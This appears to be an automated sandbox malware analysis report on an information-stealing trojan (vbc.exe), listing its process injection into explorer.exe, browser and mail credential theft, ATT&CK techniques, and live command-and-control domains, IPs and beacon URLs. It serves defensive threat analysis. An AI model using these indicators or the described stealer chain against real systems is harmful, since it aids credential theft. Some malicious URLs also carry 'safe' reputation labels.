        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Stealing of Sensitive Information

Source: Yara match | File source: 6.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000D.00000002.632823935.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.403522788.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.409203550.000000000397B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000000.463881212.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000000.484050905.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.631975004.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.631553136.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\control.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: C:\Windows\SysWOW64\control.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

        Remote Access Functionality

Source: Yara match | File source: 6.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000D.00000002.632823935.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.403522788.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.409203550.000000000397B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000000.463881212.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000000.484050905.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.631975004.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.631553136.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

MITRE ATT&CK Matrix

Techniques listed per tactic column; the bracketed digits reproduce the badge shown next to that technique in the matrix.

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Shared Modules [1]; Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
Privilege Escalation: Process Injection [612]; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
Defense Evasion: Masquerading [1]; Disable or Modify Tools [1]; Virtualization/Sandbox Evasion [31]; Process Injection [612]; Deobfuscate/Decode Files or Information [11]; Obfuscated Files or Information [3]; Software Packing [13]; File Deletion [1]
Credential Access: OS Credential Dumping [1]; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: Security Software Discovery [121]; Process Discovery [2]; Virtualization/Sandbox Evasion [31]; Remote System Discovery [1]; System Information Discovery [13]; System Owner/User Discovery; Network Sniffing; Network Service Scanning
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot
Collection: Email Collection [1]; Archive Collected Data [11]; Data from Local System [1]; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Command and Control: Encrypted Channel [1]; Ingress Tool Transfer [3]; Non-Application Layer Protocol [4]; Application Layer Protocol [114]; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue
Behavior Graph

Behavior Graph ID: 680447 | Sample: vbc.exe | Start date: 08/08/2022 | Architecture: WINDOWS | Score: 100

Start node:
• DNS/IP: www.claudianavarro.online; claudianavarro.online
• Signatures: Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; Yara detected AntiVM3; 5 other signatures
• Starts process: vbc.exe 3

vbc.exe (started):
• Dropped file: C:\Users\user\AppData\Local\...\vbc.exe.log, ASCII
• Signature: Injects a PE file into a foreign processes
• Starts processes: vbc.exe; vbc.exe

vbc.exe (child, started):
• Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
• Injects into: explorer.exe

explorer.exe (injected):
• DNS/IP: www.funwave.info 103.141.97.24, 49796, 80 VECTANTARTERIANetworksCorporationJP Japan; reprograme-se10x.com 108.167.169.56, 49798, 49799, 80 UNIFIEDLAYER-AS-1US United States; 3 other IPs or domains
• Signature: System process connects to network (likely due to code injection or exploit)
• Starts process: control.exe 13

control.exe (started):
• Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Deletes itself after installation; 2 other signatures

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample (Source | Detection | Scanner | Label):
vbc.exe | 32% | ReversingLabs | Win32.Trojan.Pwsx
vbc.exe | 100% | Joe Sandbox ML | -

Dropped Files: No Antivirus matches

Unpacked PE Files (Source | Detection | Scanner | Label):
6.0.vbc.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

Domains: No Antivirus matches
URLs (Source | Detection | Scanner | Label):
www.reliabenefitssupport.com/etn4/ | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://funwave.info/etn4/?jDK=cFN0wh5pOr2lLXB&cRvt5xTh=Cta36k8ikZqurnipoxkRmmGd40Kya2aSborXxyuf | 0% | Avira URL Cloud | safe
http://www.reprograme-se10x.com/etn4/ | 0% | Avira URL Cloud | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.reprograme-se10x.com/etn4/?cRvt5xTh=molCG9tOWGG77xzFdRevdPvUiNWpIWpi7GNNNgA2ifx3ZRGhVtKNJJVLj+R0F9QcWvNkIdZbD/ktNYP0MkMUr0Msa5tKdHW+1cW/UCZDWxnM&jDK=cFN0wh5pOr2lLXB | 0% | Avira URL Cloud | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://reprograme-se10x.com/etn4/?cRvt5xTh=molCG9tOWGG77xzFdRevdPvUiNWpIWpi7GNNNgA2ifx3ZRGhVtKNJJVLj | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.tadeumilhosrp.com/etn4/?jDK=cFN0wh5pOr2lLXB&cRvt5xTh=/R5Ku0REc5kTBOTK4FybjCic+J3HjscPDRicZMYanJDb3VFeXunUS1CfOY6dWIQDflcWbkgY3XkW9HfCwqM4rRtZZd8ZPm0cmGZ9eLaMCkCJ | 0% | Avira URL Cloud | safe
http://nginx.net/ | 0% | Avira URL Cloud | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.fontbureau.coma/ | 0% | Avira URL Cloud | safe
http://www.sajatypeworks.comtpuKK | 0% | Avira URL Cloud | safe
http://www.funwave.info/etn4/?jDK=cFN0wh5pOr2lLXB&cRvt5xTh=Cta36k8ikZqurnipoxkRmmGd40Kya2aSborXxyuf+Fe+qece1yHxQlddjwwspvxEwVKtNXVfvaYDvAKdsC9znF0tof1OuukDyDlLohNqUsvE | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.tadeumilhosrp.com/etn4/ | 0% | Avira URL Cloud | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe
Domains and IPs

Contacted Domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation):
tadeumilhosrp.com | 192.185.131.238 | true | true | - | unknown
reprograme-se10x.com | 108.167.169.56 | true | true | - | unknown
www.funwave.info | 103.141.97.24 | true | true | - | unknown
claudianavarro.online | 92.249.45.183 | true | false | - | unknown
www.tadeumilhosrp.com | unknown | unknown | true | - | unknown
www.claudianavarro.online | unknown | unknown | true | - | unknown
www.reprograme-se10x.com | unknown | unknown | true | - | unknown
Contacted URLs (Name | Malicious | Antivirus Detection | Reputation):
www.reliabenefitssupport.com/etn4/ | true | Avira URL Cloud: safe | low
http://www.reprograme-se10x.com/etn4/ | true | Avira URL Cloud: safe | unknown
http://www.reprograme-se10x.com/etn4/?cRvt5xTh=molCG9tOWGG77xzFdRevdPvUiNWpIWpi7GNNNgA2ifx3ZRGhVtKNJJVLj+R0F9QcWvNkIdZbD/ktNYP0MkMUr0Msa5tKdHW+1cW/UCZDWxnM&jDK=cFN0wh5pOr2lLXB | true | Avira URL Cloud: safe | unknown
http://www.tadeumilhosrp.com/etn4/?jDK=cFN0wh5pOr2lLXB&cRvt5xTh=/R5Ku0REc5kTBOTK4FybjCic+J3HjscPDRicZMYanJDb3VFeXunUS1CfOY6dWIQDflcWbkgY3XkW9HfCwqM4rRtZZd8ZPm0cmGZ9eLaMCkCJ | true | Avira URL Cloud: safe | unknown
http://www.funwave.info/etn4/?jDK=cFN0wh5pOr2lLXB&cRvt5xTh=Cta36k8ikZqurnipoxkRmmGd40Kya2aSborXxyuf+Fe+qece1yHxQlddjwwspvxEwVKtNXVfvaYDvAKdsC9znF0tof1OuukDyDlLohNqUsvE | true | Avira URL Cloud: safe | unknown
http://www.tadeumilhosrp.com/etn4/ | true | Avira URL Cloud: safe | unknown
URLs from Memory and Binaries (Name | Source | Malicious | Antivirus Detection | Reputation):
http://www.apache.org/licenses/LICENSE-2.0 | vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.fontbureau.com | vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.fontbureau.com/designersG | vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.fontbureau.com/designers/? | vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.founder.com.cn/cn/bThe | vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://funwave.info/etn4/?jDK=cFN0wh5pOr2lLXB&cRvt5xTh=Cta36k8ikZqurnipoxkRmmGd40Kya2aSborXxyuf | control.exe, 0000000D.00000002.645614968.0000000005496000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers? | vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.tiro.com | vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.goodfont.co.kr | vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.coml | vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://reprograme-se10x.com/etn4/?cRvt5xTh=molCG9tOWGG77xzFdRevdPvUiNWpIWpi7GNNNgA2ifx3ZRGhVtKNJJVLj | control.exe, 0000000D.00000002.645688479.0000000005592000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.founder.com.cn/cn/cThe | vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://nginx.net/ | control.exe, 0000000D.00000002.645738782.000000000568E000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=30055406629 | control.exe, 0000000D.00000003.605166525.00000000079F4000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://fontfabrik.com | vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.google.com/chrome/https://www.google.com/chrome/thank-you.htmlabout:blankhttps://adservi | control.exe, 0000000D.00000003.605166525.00000000079F4000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.fontbureau.com/designers/frere-jones.html | vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.fontbureau.coma/ | vbc.exe, 00000000.00000002.406494401.0000000001037000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://fedoraproject.org/ | control.exe, 0000000D.00000002.645738782.000000000568E000.00000004.10000000.00040000.00000000.sdmp | false | - | high
http://www.sajatypeworks.comtpuKK | vbc.exe, 00000000.00000003.367848176.000000000103D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.jiyu-kobo.co.jp/ | vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.fonts.com | vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.sandoll.co.kr | vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.sakkal.com | vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
Contacted IPs (IP | Domain | Country | ASN | ASN Name | Malicious):
103.141.97.24 | www.funwave.info | Japan | 2519 | VECTANTARTERIANetworksCorporationJP | true
192.185.131.238 | tadeumilhosrp.com | United States | 46606 | UNIFIEDLAYER-AS-1US | true
108.167.169.56 | reprograme-se10x.com | United States | 46606 | UNIFIEDLAYER-AS-1US | true
General Information

Joe Sandbox Version: 35.0.0 Citrine
Analysis ID: 680447
Start date and time: 08/08/2022 16:08:12 (2022-08-08 16:08:12 +02:00)
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 8m 55s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: vbc.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 21
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@6/2@4/3
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 100% (good quality ratio 87.4%)
• Quality average: 71.9%
• Quality standard deviation: 33.1%
HCA Information:
• Successful, ratio: 94%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .exe
• Adjust boot time
• Enable AMSI
• Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 23.211.6.115, 40.125.122.176, 20.54.89.106, 52.242.101.226, 20.223.24.244, 52.152.110.14
• Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, e12564.dspb.akamaiedge.net, rp-consumer-prod-displaycatalog-geomap.trafficmanager.net, login.live.com, store-images.s-microsoft.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded the maximum time and may be missing disassembly code information
• Report size getting too big, too many NtAllocateVirtualMemory calls found
Simulations (Time | Type | Description):
16:09:32 | API Interceptor | 2x Sleep call for process: vbc.exe modified
                                                No context
                                                Process:C:\Users\user\Desktop\vbc.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1308
                                                Entropy (8bit):5.345811588615766
                                                Encrypted:false
                                                SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84FsXE8:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzu
                                                MD5:2E016B886BDB8389D2DD0867BE55F87B
                                                SHA1:25D28EF2ACBB41764571E06E11BF4C05DD0E2F8B
                                                SHA-256:1D037CF00A8849E6866603297F85D3DABE09535E72EDD2636FB7D0F6C7DA3427
                                                SHA-512:C100729153954328AA2A77EECB2A3CBD03CB7E8E23D736000F890B17AAA50BA87745E30FB9E2B0D61E16DCA45694C79B4CE09B9F4475220BEB38CAEA546CFC2A
                                                Malicious:true
                                                Reputation:high, very likely benign file
                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                Process:C:\Windows\SysWOW64\control.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                Category:dropped
                                                Size (bytes):40960
                                                Entropy (8bit):0.792852251086831
                                                Encrypted:false
                                                SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                Malicious:false
                                                Reputation:high, very likely benign file
                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Entropy (8bit):7.770445517790858
